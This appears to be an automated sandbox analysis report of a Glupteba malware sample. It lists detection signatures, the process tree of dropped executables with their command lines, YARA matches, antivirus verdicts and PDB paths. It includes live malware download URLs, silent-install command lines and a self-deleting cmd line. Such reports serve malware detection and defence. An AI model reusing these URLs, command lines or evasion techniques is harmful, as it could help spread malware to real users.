Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Generic.mg.cf35edde149e46ee.15941

Overview

General Information

Sample Name:SecuriteInfo.com.Generic.mg.cf35edde149e46ee.15941 (renamed file extension from 15941 to exe)
Analysis ID:352870
MD5:cf35edde149e46ee5dcafa4151dd4a81
SHA1:bd920d23e20dd55fce50c1a4cb6294a65d3fd5d9
SHA256:576c0f0c427bc26f4f32211bb46a7430085cc5dda994f3c1829921d41236cb09

Most interesting Screenshot:

Detection

Glupteba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Glupteba
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Creates multiple autostart registry keys
Found Tor onion address
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Terminates after testing mutex exists (may check infected machine status)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe (PID: 3496 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe' MD5: CF35EDDE149E46EE5DCAFA4151DD4A81)
    • multitimer.exe (PID: 1692 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102 MD5: E252EF40FF9D0A528918215DB75A8EB9)
      • multitimer.exe (PID: 3524 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
        • multitimer.exe (PID: 6644 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
          • safebits.exe (PID: 5576 cmdline: 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451 MD5: 7504A339516D6AB6F35C55CD96810040)
            • hh.exe (PID: 6300 cmdline: 'C:\windows\hh.exe' MD5: A50C9DF7603E2F1AEA6B54053794A326)
          • 2mqvpn30gyk.exe (PID: 6768 cmdline: 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8 MD5: A0B220137332876ABC6DD8D91F2DD363)
            • cmd.exe (PID: 4484 cmdline: 'C:\Windows\System32\cmd.exe' /k 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • 89C8W4UQT.exe (PID: 5532 cmdline: 'C:\Program Files\89C8W4UQTF\89C8W4UQT.exe' 57a764d042bf8 MD5: 6195B97E8DCE6CE5E279A68E7BA4BE3F)
          • tpwlxkeo40z.exe (PID: 6420 cmdline: 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparams MD5: 83BD1D79670EF5335E6533AE8285AB22)
            • conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • vksqeekarkn.exe (PID: 5536 cmdline: 'C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exe' /VERYSILENT /p=testparams MD5: 725F35103362F3F1410216F5ED785A1F)
          • AwesomePoolE1.exe (PID: 768 cmdline: 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
          • vkfgkd5pxm1.exe (PID: 1548 cmdline: 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: 57664817E1CE6474C6FB8201675AC09E)
            • cmd.exe (PID: 5992 cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • installer.exe (PID: 744 cmdline: 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209 MD5: 57A499F8970931ED49142A0392846212)
          • app.exe (PID: 6452 cmdline: 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23 MD5: CA391A385DA53FAE727E8B060FCB05C3)
          • AwesomePoolE1.exe (PID: 6456 cmdline: 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe' MD5: 0E5F029EB6ECABF1E593E12211887506)
          • vpn.exe (PID: 4904 cmdline: 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482 MD5: A9487E1960820EB2BA0019491D3B08CE)
          • installer.exe (PID: 6968 cmdline: 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209 MD5: 57A499F8970931ED49142A0392846212)
          • g5qbddy2kmz.exe (PID: 2740 cmdline: 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8 MD5: A0B220137332876ABC6DD8D91F2DD363)
          • safebits.exe (PID: 5956 cmdline: 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451 MD5: 7504A339516D6AB6F35C55CD96810040)
            • hh.exe (PID: 4592 cmdline: 'C:\windows\hh.exe' MD5: A50C9DF7603E2F1AEA6B54053794A326)
          • uhmrme5g5sj.exe (PID: 6884 cmdline: 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparams MD5: 83BD1D79670EF5335E6533AE8285AB22)
            • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • 5asqork1n2b.exe (PID: 2016 cmdline: 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe' MD5: 57664817E1CE6474C6FB8201675AC09E)
          • app.exe (PID: 6212 cmdline: 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23 MD5: CA391A385DA53FAE727E8B060FCB05C3)
          • vpn.exe (PID: 5276 cmdline: 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482 MD5: A9487E1960820EB2BA0019491D3B08CE)
  • svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • multitimer.exe (PID: 1844 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
    • multitimer.exe (PID: 204 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
  • svchost.exe (PID: 6744 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • multitimer.exe (PID: 3400 cmdline: 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5 MD5: E252EF40FF9D0A528918215DB75A8EB9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
    00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
      0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
        00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
          0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmpJoeSecurity_GluptebaYara detected GluptebaJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.2.app.exe.3d72670.6.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x43598:$s2: The Magic Word!
            • 0x4f6d8:$s2: The Magic Word!
            • 0x438f8:$s3: Software\Oracle\VirtualBox
            • 0x43587:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            19.3.app.exe.45853c0.0.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3f9f8:$s2: The Magic Word!
            • 0x4bb38:$s2: The Magic Word!
            • 0x3fd58:$s3: Software\Oracle\VirtualBox
            • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            19.3.app.exe.4587620.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3d798:$s2: The Magic Word!
            • 0x498d8:$s2: The Magic Word!
            • 0x3daf8:$s3: Software\Oracle\VirtualBox
            • 0x3d787:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            19.2.app.exe.9e63c0.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3f9f8:$s2: The Magic Word!
            • 0x4bb38:$s2: The Magic Word!
            • 0x3fd58:$s3: Software\Oracle\VirtualBox
            • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            19.2.app.exe.3d76210.7.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
            • 0x3f9f8:$s2: The Magic Word!
            • 0x4bb38:$s2: The Magic Word!
            • 0x3fd58:$s3: Software\Oracle\VirtualBox
            • 0x3f9e7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
            Click to see the 9 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Failed Code Integrity ChecksShow sources
            Source: Event LogsAuthor: Thomas Patzke: Data: EventID: 5038, Source: Microsoft-Windows-Security-Auditing, data 0: \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://nvidsame.com/app/app.exeAvira URL Cloud: Label: malware
            Source: http://newscommer.com/app/app.exeAvira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exeAvira: detection malicious, Label: HEUR/AGEN.1138963
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeAvira: detection malicious, Label: HEUR/AGEN.1133205
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeAvira: detection malicious, Label: HEUR/AGEN.1139468
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeAvira: detection malicious, Label: HEUR/AGEN.1139468
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeAvira: detection malicious, Label: HEUR/AGEN.1139468
            Source: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exeAvira: detection malicious, Label: HEUR/AGEN.1133205
            Source: C:\Program Files\89C8W4UQTF\uninstaller.exeAvira: detection malicious, Label: HEUR/AGEN.1133205
            Source: C:\Program Files\89C8W4UQTF\89C8W4UQT.exeAvira: detection malicious, Label: HEUR/AGEN.1133205
            Source: C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exeAvira: detection malicious, Label: HEUR/AGEN.1139468
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeAvira: detection malicious, Label: HEUR/AGEN.1139468
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeAvira: detection malicious, Label: HEUR/AGEN.1138963
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeMetadefender: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeReversingLabs: Detection: 82%
            Source: C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exeReversingLabs: Detection: 64%
            Source: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exeMetadefender: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exeReversingLabs: Detection: 82%
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeReversingLabs: Detection: 27%
            Source: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exeMetadefender: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exeReversingLabs: Detection: 82%
            Multi AV Scanner detection for submitted fileShow sources
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeVirustotal: Detection: 31%Perma Link
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeReversingLabs: Detection: 27%
            Yara detected GluptebaShow sources
            Source: Yara matchFile source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeJoe Sandbox ML: detected
            Source: C:\Program Files\89C8W4UQTF\uninstaller.exeJoe Sandbox ML: detected
            Source: C:\Program Files\89C8W4UQTF\89C8W4UQT.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeJoe Sandbox ML: detected
            Source: 13.2.safebits.exe.3660000.8.unpackAvira: Label: TR/Patched.Ren.Gen
            Source: 13.2.safebits.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2

            Bitcoin Miner:

            barindex
            Yara detected GluptebaShow sources
            Source: Yara matchFile source: 0000001C.00000002.867034664.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.841596778.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.866048884.0000000003790000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.801918341.00000000040C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.801926180.0000000003FA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: app.exe PID: 6452, type: MEMORY
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.3790e50.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.app.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.3.app.exe.3fa0000.3.unpack, type: UNPACKEDPE

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeUnpacked PE file: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 2.2.multitimer.exe.470000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 3.2.multitimer.exe.60000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 8.2.multitimer.exe.e10000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeUnpacked PE file: 13.2.safebits.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeUnpacked PE file: 19.2.app.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeUnpacked PE file: 19.2.app.exe.400000.0.unpack
            Creates a directory in C:\Program FilesShow sources
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exe.config
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\uninstaller.exe
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDirectory created: C:\Program Files\89C8W4UQTF\uninstaller.exe.config
            Creates a software uninstall entryShow sources
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{4864a531-7c66-4f8b-8bca-339fdcb93393}
            Uses new MSVCR DllsShow sources
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dllJump to behavior
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdbw) source: tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\PopUnder\PopUnder\obj\Release\SiZebiLin.pdb source: tpwlxkeo40z.exe
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb source: 2mqvpn30gyk.exe
            Source: Binary string: symsrv.pdb source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdbcE source: 2mqvpn30gyk.exe, 0000000E.00000002.764745587.000000000266E000.00000004.00000001.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: mscorrc.pdb source: multitimer.exe, 00000002.00000002.668297568.0000000000CC0000.00000002.00000001.sdmp, multitimer.exe, 00000003.00000002.681530464.0000000000990000.00000002.00000001.sdmp, multitimer.exe, 00000008.00000002.723019042.0000000003110000.00000002.00000001.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: multitimer.exe, 00000002.00000002.669955444.000000001B530000.00000004.00000001.sdmp, multitimer.exe, 00000003.00000002.683380716.00000000127CB000.00000004.00000001.sdmp, multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb#7 source: 2mqvpn30gyk.exe, 0000000E.00000002.740880867.0000000000262000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb22 source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Z:\Users\wizzlabs\Desktop\Wizzcaster_V2\WizzcasterInstaller\WizzcasterInstaller\obj\Release\Emotissa.pdb source: 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\projects\assetstudio\AssetStudio\obj\Release\AssetStudio.pdb source: tpwlxkeo40z.exe
            Source: Binary string: dbghelp.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
